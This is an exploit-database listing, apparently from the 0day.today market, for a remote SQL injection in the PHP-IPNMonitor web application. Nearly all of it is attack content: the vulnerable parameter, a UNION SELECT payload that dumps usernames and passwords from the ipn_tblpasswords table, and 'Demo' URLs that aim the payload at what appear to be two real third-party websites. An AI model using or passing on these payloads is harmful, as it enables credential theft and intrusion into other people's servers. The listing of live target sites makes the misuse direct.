[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP-IPNMonitor (maincat_id) Remote SQL Injection Vulnerability

Author
noname
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5759
Category
web applications
Date add
10-09-2009
Platform
unsorted
==============================================================
PHP-IPNMonitor (maincat_id) Remote SQL Injection Vulnerability
==============================================================


[+] SQL injection vulnerability
[+] PHP-IPNMonitor - sell digital downloads online
[+] Download : http://www.withinweb.com/phpipnmonitor/
 
[+] Bugs = index.php?maincat_id=
 
[+] exploit = -null+union+select+concat(username,0x3a,userpassword)+from+ipn_tblpasswords--


[+] Example
[+]        : http://localhost/[patch]/index.php?maincat_id=-null+union+select+concat(username,0x3a,userpassword)+from+ipn_tblpasswords--



[+] Demo 
[+]        : http://www.beardsmith.com/ipnmonitor/index.php?maincat_id=-null+union+select+concat(username,0x3a,userpassword)+from+ipn_tblpasswords--
[+]	   : http://www.earrelaphant.com/ipnmonitor/cart/index.php?maincat_id=-null+union+select+concat(username,0x3a,userpassword)+from+ipn_tblpasswords--




#  0day.today [2024-07-07]  #